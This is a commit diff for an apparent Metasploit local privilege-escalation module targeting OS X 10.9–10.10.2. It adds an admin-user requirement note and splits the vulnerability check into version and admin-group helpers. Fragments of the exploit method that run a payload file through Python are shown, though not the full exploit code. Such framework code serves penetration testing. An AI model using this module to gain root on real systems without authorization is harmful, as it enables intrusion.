File tree Expand file tree Collapse file tree 1 file changed +13
-3
lines changed
modules/exploits/osx/local Expand file tree Collapse file tree 1 file changed +13
-3
lines changed Original file line number Diff line number Diff line change @@ -23,6 +23,8 @@ def initialize(info = {})
2323 Tested on Yosemite 10.10.2 and should work on previous versions.
2424
2525 The patch for this issue was not backported to older releases.
26+
27+ Note: you must run this exploit as an admin user to escalate to root.
2628 } ,
2729 'Author' => [
2830 'Emil Kvarnhammar' , # Vulnerability discovery and PoC
@@ -57,9 +59,7 @@ def initialize(info = {})
5759 end
5860
5961 def check
60- Gem ::Version . new ( get_sysinfo [ 'ProductVersion' ] ) . between? (
61- Gem ::Version . new ( '10.9' ) , Gem ::Version . new ( '10.10.2' )
62- ) ? Exploit ::CheckCode ::Vulnerable : Exploit ::CheckCode ::Safe
62+ ( ver? && admin? ) ? Exploit ::CheckCode ::Vulnerable : Exploit ::CheckCode ::Safe
6363 end
6464
6565 def exploit
@@ -77,6 +77,16 @@ def exploit
7777 cmd_exec ( payload_file )
7878 end
7979
80+ def ver?
81+ Gem ::Version . new ( get_sysinfo [ 'ProductVersion' ] ) . between? (
82+ Gem ::Version . new ( '10.9' ) , Gem ::Version . new ( '10.10.2' )
83+ )
84+ end
85+
86+ def admin?
87+ cmd_exec ( 'groups | grep -wq admin && echo true' ) == 'true'
88+ end
89+
8090 def sploit
8191 "#{ datastore [ 'PYTHON' ] } #{ exploit_file } #{ payload_file } #{ payload_file }
8292 end
You can’t perform that action at this time.
0 commit comments